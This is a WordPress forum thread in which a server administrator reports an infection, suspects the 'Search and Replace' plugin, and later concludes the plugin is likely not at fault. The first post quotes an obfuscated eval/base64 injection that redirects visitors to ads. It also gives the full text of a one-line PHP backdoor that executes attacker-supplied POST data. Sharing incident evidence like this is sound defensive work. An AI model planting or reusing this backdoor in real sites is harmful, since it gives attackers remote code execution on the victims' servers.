WordPress.org

Ready to get started?Download WordPress

Forums

Search and Replace
Possible security issue in "search and repalce" 2.6 (4 posts)

  1. louisremi
    Member
    Posted 1 year ago #

    Hi,

    One the server I'm administrating was corrupted. We aren't exactly sure about what happened yet but here's what we've found:
    - There's a block of code beginning with <?php eval(base64_decode("DQplcnJvcl... at the top of each php file on the server. This code redirects visitors to ads when their referrer is a search engine.
    - There's a single backdoor in the theme of a WordPress installed on the server: <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>. Since this code is only present once on the server, we think the origin of the exploit can be narrowed down to this WordPress install.
    - There are several plugins installed on this WordPress, including "search and replace", but search-and-replace.php is the only file on the server that is riddled with <?php eval(base64_decode("DQplcnJvcl... blocks (not just one at the top), see this pastebin: http://pastebin.com/jmynTEgx

    I just wanted to let you know and see if other users had similar troubles.

    http://wordpress.org/extend/plugins/search-and-replace/

  2. NFWRo
    Member
    Posted 1 year ago #

    Hi
    I was just about to use this plugin, but have read this and am now rather concerned. Did this plugin prove to be the problem? Has anyone else encountered it?

  3. louisremi
    Member
    Posted 1 year ago #

    Hi,

    We haven't been able to gather more information about our security issue, and as you can see, no one else reported similar problems.
    I guess this plugin is not to blame after all.

  4. NFWRo
    Member
    Posted 1 year ago #

    Thanks for the update - that's good to know.

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic